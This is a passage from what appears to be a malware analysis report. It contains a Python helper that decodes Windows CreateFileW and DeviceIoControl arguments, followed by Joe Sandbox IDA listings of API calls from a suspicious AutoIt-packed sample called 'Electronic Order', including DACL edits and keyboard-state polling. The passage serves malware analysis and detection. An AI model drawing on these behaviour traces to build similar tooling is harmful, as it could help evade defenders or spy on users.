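              0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING",
              0x10000000: "FILE_FLAG_RANDOM_ACCESS",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x00000080: "FILE_ATTRIBUTE_NORMAL"}


def _bits(value: int, table: dict) -> list:
    """Name every flag from `table` that is set in `value`, highest bit first."""
    return [name for bit, name in sorted(table.items(), reverse=True) if value & bit]


def decode_create_file(access: int, share: int, disposition: int, flags: int) -> dict:
    """Name the CreateFileW arguments in the order the API listing prints them."""
    return {
        "access": _bits(access, GENERIC_RIGHTS),
        "share": "exclusive" if share == 0 else f"0x{share:x}",
        "disposition": DISPOSITIONS.get(disposition, f"0x{disposition:x}"),
        "flags": _bits(flags, FILE_FLAGS),
    }


def is_reparse_point_write(create_flags: int, ioctl: int) -> bool:
    """True when the handle was opened to reach the reparse point itself
    (not its target) and the control code sets a reparse tag on it."""
    flags = _bits(create_flags, FILE_FLAGS)
    return ("FILE_FLAG_OPEN_REPARSE_POINT" in flags
            and decode_ioctl(ioctl)["name"] == "FSCTL_SET_REPARSE_POINT")


if __name__ == "__main__":
    # Argument values copied from the listing above:
    # CreateFileW(?,40000000,00000000,00000000,00000003,02200000,00000000)
    # DeviceIoControl(00000000,000900A4,?,?,00000000,00000000,?,00000000)
    print(decode_create_file(0x40000000, 0, 3, 0x02200000))
    print(decode_ioctl(0x000900A4))
    print(is_reparse_point_write(0x02200000, 0x000900A4))
```

The same decoder applies to any DeviceIoControl line in a report of this kind; a non-file-system device type or an untabulated function number still yields the raw CTL_CODE fields, which is usually enough to look the code up. Note that FSCTL_SET_REPARSE_POINT by itself is not malicious: the same sequence is how legitimate tools create directory junctions, so the finding is the combination with the rest of the sample's behaviour, not the call alone.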
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 00E2DC7B
                                      • _wcscat.LIBCMT ref: 00E2DC93
                                      • _wcscat.LIBCMT ref: 00E2DCA5
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E2DCBA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2DCCE
                                      • GetFileAttributesW.KERNEL32(?), ref: 00E2DCE6
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E2DD00
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2DD12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      • Opcode ID: 0402fe853e522d3bcff61f74496c1f7cfa25d637b83ce1eaf0669ab4e95b6a0a
                                      • Instruction ID: 9cb089f26080ea8d7b3a968a659830cfc07dde6e073c7b8accad71ef2b918b97
                                      • Opcode Fuzzy Hash: 0402fe853e522d3bcff61f74496c1f7cfa25d637b83ce1eaf0669ab4e95b6a0a
                                      • Instruction Fuzzy Hash: 7681D3715082519FCB20EF24DC559AAB7E8FF88314F19982EF989E7250E670ED44CB62
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E4C4EC
                                      • GetFocus.USER32 ref: 00E4C4FC
                                      • GetDlgCtrlID.USER32(00000000), ref: 00E4C507
                                      • _memset.LIBCMT ref: 00E4C632
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E4C65D
                                      • GetMenuItemCount.USER32(?), ref: 00E4C67D
                                      • GetMenuItemID.USER32(?,00000000), ref: 00E4C690
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E4C6C4
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E4C70C
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E4C744
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E4C779
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: c768ada1e38ed4aaa08c4eaef5915091cecbe15fdc2b97460e534e05f8b47461
                                      • Instruction ID: 3bcba28d462e9214c790298952f68b9fda002508bdb3c473ae4a9ea350fef142
                                      • Opcode Fuzzy Hash: c768ada1e38ed4aaa08c4eaef5915091cecbe15fdc2b97460e534e05f8b47461
                                      • Instruction Fuzzy Hash: 4481B3705093019FD750DF25E884A6BBBE8FF88718F20552EF999A3291D731D905CFA2
                                      APIs
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                        • Part of subcall function 00E1874A: GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                        • Part of subcall function 00E1874A: GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                        • Part of subcall function 00E1874A: HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                        • Part of subcall function 00E187E7: GetProcessHeap.KERNEL32(00000008,00E18240,00000000,00000000,?,00E18240,?), ref: 00E187F3
                                        • Part of subcall function 00E187E7: HeapAlloc.KERNEL32(00000000,?,00E18240,?), ref: 00E187FA
                                        • Part of subcall function 00E187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E18240,?), ref: 00E1880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E18458
                                      • _memset.LIBCMT ref: 00E1846D
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1848C
                                      • GetLengthSid.ADVAPI32(?), ref: 00E1849D
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E184DA
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E184F6
                                      • GetLengthSid.ADVAPI32(?), ref: 00E18513
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E18522
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E18529
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1854A
                                      • CopySid.ADVAPI32(00000000), ref: 00E18551
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E18582
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E185A8
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E185BC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 5b25a2c4fa1844218b3bfb293db6261a464b130239b60cbe766122782f31aa60
                                      • Instruction ID: b71943d124e54ec97f0d6ed26c0de3212923349a052977960abbeaa664f2961a
                                      • Opcode Fuzzy Hash: 5b25a2c4fa1844218b3bfb293db6261a464b130239b60cbe766122782f31aa60
                                      • Instruction Fuzzy Hash: 2F615675A0020AAFDF00DFA1DD44AEEBBBAFF45714F448269E815B7291DB309A45CF60
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00E376A2
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E376AE
                                      • CreateCompatibleDC.GDI32(?), ref: 00E376BA
                                      • SelectObject.GDI32(00000000,?), ref: 00E376C7
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E3771B
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E37757
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E3777B
                                      • SelectObject.GDI32(00000006,?), ref: 00E37783
                                      • DeleteObject.GDI32(?), ref: 00E3778C
                                      • DeleteDC.GDI32(00000006), ref: 00E37793
                                      • ReleaseDC.USER32(00000000,?), ref: 00E3779E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: ca25718b5f3745899a30078769f6bd4da4b6f41a08b4357c02a5dcfb812371ca
                                      • Instruction ID: 766351ce99a575ed2b9aaba80a0e98bee97b08299fef34a0b5db9d8b6000141e
                                      • Opcode Fuzzy Hash: ca25718b5f3745899a30078769f6bd4da4b6f41a08b4357c02a5dcfb812371ca
                                      • Instruction Fuzzy Hash: 8D515175904209EFCB25CFA9CC89EAEBBB9EF49710F14841DF989A7210D731A845CB60
                                      APIs
                                        • Part of subcall function 00DE0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DC6C6C,?,00008000), ref: 00DE0BB7
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DC6D0D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC6E5A
                                        • Part of subcall function 00DC59CD: _wcscpy.LIBCMT ref: 00DC5A05
                                        • Part of subcall function 00DE387D: _iswctype.LIBCMT ref: 00DE3885
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-1018226102
                                      • Opcode ID: 4188a4f6864eed722b7328bc4e52d352a498d7cf7893ec0cd9c8d27673f70278
                                      • Instruction ID: bd769db663e13c9efa367d126d514db86631a38d7a71e44d78c47b487d768bb2
                                      • Opcode Fuzzy Hash: 4188a4f6864eed722b7328bc4e52d352a498d7cf7893ec0cd9c8d27673f70278
                                      • Instruction Fuzzy Hash: 6E026B301083469FC724EF24C891EAFBBE5EF95354F14491DF58A972A1DB30E989CB62
                                      APIs
                                      • _memset.LIBCMT ref: 00DC45F9
                                      • GetMenuItemCount.USER32(00E86890), ref: 00DFD7CD
                                      • GetMenuItemCount.USER32(00E86890), ref: 00DFD87D
                                      • GetCursorPos.USER32(?), ref: 00DFD8C1
                                      • SetForegroundWindow.USER32(00000000), ref: 00DFD8CA
                                      • TrackPopupMenuEx.USER32(00E86890,00000000,?,00000000,00000000,00000000), ref: 00DFD8DD
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DFD8E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: cff7d631f948d82514c43181df0a3e6b0631494718c65ea1223485844067c442
                                      • Instruction ID: 68aa801549692f54e19c784c29800a23ee35f0b1f23ab3b79ddb75373bc8e890
                                      • Opcode Fuzzy Hash: cff7d631f948d82514c43181df0a3e6b0631494718c65ea1223485844067c442
                                      • Instruction Fuzzy Hash: A571263164020ABEEB319F55DC45FBABF66FF05764F24821AF615AA1E0C7B19C10DBA0
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00E38BEC
                                      • CoInitialize.OLE32(00000000), ref: 00E38C19
                                      • CoUninitialize.OLE32 ref: 00E38C23
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00E38D23
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E38E50
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E52C0C), ref: 00E38E84
                                      • CoGetObject.OLE32(?,00000000,00E52C0C,?), ref: 00E38EA7
                                      • SetErrorMode.KERNEL32(00000000), ref: 00E38EBA
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E38F3A
                                      • VariantClear.OLEAUT32(?), ref: 00E38F4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID: ,,
                                      • API String ID: 2395222682-1556401989
                                      • Opcode ID: c43b372652c0b6ecd268224bab1060aec2e4b8caa16e4fe08089ec74c1ecf36d
                                      • Instruction ID: a721eda8a577dd0fd04fe33797144ce0aaa2636b4bcf5820b726777d038948dd
                                      • Opcode Fuzzy Hash: c43b372652c0b6ecd268224bab1060aec2e4b8caa16e4fe08089ec74c1ecf36d
                                      • Instruction Fuzzy Hash: DBC15571208305AFC700DF64C98892BBBE9FF89708F00595DF58AAB251DB71ED06CB62
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      • Opcode ID: dce0f73992a10d29487e16699be6897e6a5b3a5f2cbd8ff8885dbf66f0da0f60
                                      • Instruction ID: 1b1f21aec8106d7f5090093bb2d11e2a00caeecdc2b333e79617bcc5c7763fc2
                                      • Opcode Fuzzy Hash: dce0f73992a10d29487e16699be6897e6a5b3a5f2cbd8ff8885dbf66f0da0f60
                                      • Instruction Fuzzy Hash: 8C416F3015128E8BCF10EF91EC91AEA3B24FF51314F505498FD95AB691DB70AD9ACB70
                                      APIs
                                        • Part of subcall function 00DC7D2C: _memmove.LIBCMT ref: 00DC7D66
                                        • Part of subcall function 00DC7A84: _memmove.LIBCMT ref: 00DC7B0D
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E255D2
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E255E8
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E255F9
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E2560B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E2561C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      • Opcode ID: e4fbcf6b1e495c85273bb1314cefdff03bf1e1d253092f1e1e943707a2fc9d98
                                      • Instruction ID: 95b4b52f4efa9b2eba47d27840ea9f165e1e2d4db1239087953b53071df6ad92
                                      • Opcode Fuzzy Hash: e4fbcf6b1e495c85273bb1314cefdff03bf1e1d253092f1e1e943707a2fc9d98
                                      • Instruction Fuzzy Hash: FF11602155026A79E720BAA2DC8AEFF7B7CEFD1B00F485469B419B70D1DEA01D05CAB1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      • Opcode ID: afd48edb933211d6c8c0b4c7905d97b8f24ad793698f96491ed0541a0eaecd68
                                      • Instruction ID: 1a91bf94fb8067f2f5f79f99577ee386dd2a6a2fec72a364d18ed50c0c78569a
                                      • Opcode Fuzzy Hash: afd48edb933211d6c8c0b4c7905d97b8f24ad793698f96491ed0541a0eaecd68
                                      • Instruction Fuzzy Hash: 69110575904125AFDB24EB21EC4AEEF77ACDF81B10F040176F405B6091EF749AC68671
                                      APIs
                                      • timeGetTime.WINMM ref: 00E2521C
                                        • Part of subcall function 00DE0719: timeGetTime.WINMM(?,7694B400,00DD0FF9), ref: 00DE071D
                                      • Sleep.KERNEL32(0000000A), ref: 00E25248
                                      • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E2526C
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E2528E
                                      • SetActiveWindow.USER32 ref: 00E252AD
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E252BB
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E252DA
                                      • Sleep.KERNEL32(000000FA), ref: 00E252E5
                                      • IsWindow.USER32 ref: 00E252F1
                                      • EndDialog.USER32(00000000), ref: 00E25302
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: ac34d1c9ed07f982834f62529d31d03c6283b49632fc624b33634247504d6419
                                      • Instruction ID: cb31d47b66461e8e449b2aa71a8fe30cdd632e26991dcd9745e38172a2995ad9
                                      • Opcode Fuzzy Hash: ac34d1c9ed07f982834f62529d31d03c6283b49632fc624b33634247504d6419
                                      • Instruction Fuzzy Hash: 3121C676104714EFE7005B32FE89B263B6AEB4679AF103474F009B11B1DBB59C498B71
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CoInitialize.OLE32(00000000), ref: 00E2D855
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E2D8E8
                                      • SHGetDesktopFolder.SHELL32(?), ref: 00E2D8FC
                                      • CoCreateInstance.OLE32(00E52D7C,00000000,00000001,00E7A89C,?), ref: 00E2D948
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E2D9B7
                                      • CoTaskMemFree.OLE32(?,?), ref: 00E2DA0F
                                      • _memset.LIBCMT ref: 00E2DA4C
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00E2DA88
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E2DAAB
                                      • CoTaskMemFree.OLE32(00000000), ref: 00E2DAB2
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E2DAE9
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00E2DAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 3721a864ac592a96d707eeecc0849345c6d684ce94c5579ce7e22e95e3971bdf
                                      • Instruction ID: a07c947cfaa74773b311b6659037334cfac278c9058d2f07e524dc050eccaa99
                                      • Opcode Fuzzy Hash: 3721a864ac592a96d707eeecc0849345c6d684ce94c5579ce7e22e95e3971bdf
                                      • Instruction Fuzzy Hash: 48B10B75A00119AFDB04DF65DC88EAEBBF9EF48304B1484A9F909EB251DB30ED45CB60
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00E205A7
                                      • SetKeyboardState.USER32(?), ref: 00E20612
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E20632
                                      • GetKeyState.USER32(000000A0), ref: 00E20649
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E20678
                                      • GetKeyState.USER32(000000A1), ref: 00E20689
                                      • GetAsyncKeyState.USER32(00000011), ref: 00E206B5
                                      • GetKeyState.USER32(00000011), ref: 00E206C3
                                      • GetAsyncKeyState.USER32(00000012), ref: 00E206EC
                                      • GetKeyState.USER32(00000012), ref: 00E206FA
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E20723
                                      • GetKeyState.USER32(0000005B), ref: 00E20731
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
